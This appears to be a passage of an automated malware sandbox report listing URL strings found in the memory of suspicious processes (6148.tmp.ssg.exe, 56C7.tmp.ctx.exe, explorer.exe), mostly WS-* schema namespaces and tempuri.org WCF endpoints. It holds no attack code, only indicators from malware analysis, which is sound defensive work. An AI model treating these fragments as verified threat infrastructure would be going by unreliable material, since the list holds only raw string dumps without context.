                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002D4A000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1769771051.0000000003D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002D4A000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002D4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000002C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                          Source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513577063.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513867334.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512658060.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512879245.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1528803762.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1533732918.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1532153483.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1534857194.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513327898.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1530758520.000001B34401F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                          Source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513577063.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513867334.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512658060.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512879245.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1528803762.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1533732918.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1532153483.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1534857194.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513327898.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1530758520.000001B34401F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                          Source: 56C7.tmp.ctx.exe, 0000000B.00000003.1513577063.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513867334.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512658060.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1512879245.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1528803762.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1533732918.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1532153483.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1534857194.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1513327898.000001B34401F000.00000004.00000020.00020000.00000000.sdmp, 56C7.tmp.ctx.exe, 0000000B.00000003.1530758520.000001B34401F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                          Source: 56C7.tmp.ctx.exe, 0000000B.00000003.1527735841.000001B34401F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
                          Source: 56C7.tmp.ctx.exe, 00000010.00000002.1550901647.0000026ABD7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3869465979.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3086750323.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.activedirectory.
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.li
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.live-int
                          Source: explorer.exe, 00000005.00000002.3822099222.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1331938648.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3082261334.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2193186163.00000000089B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexe
                          Source: explorer.exe, 00000005.00000000.1348239607.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3869465979.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3086750323.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
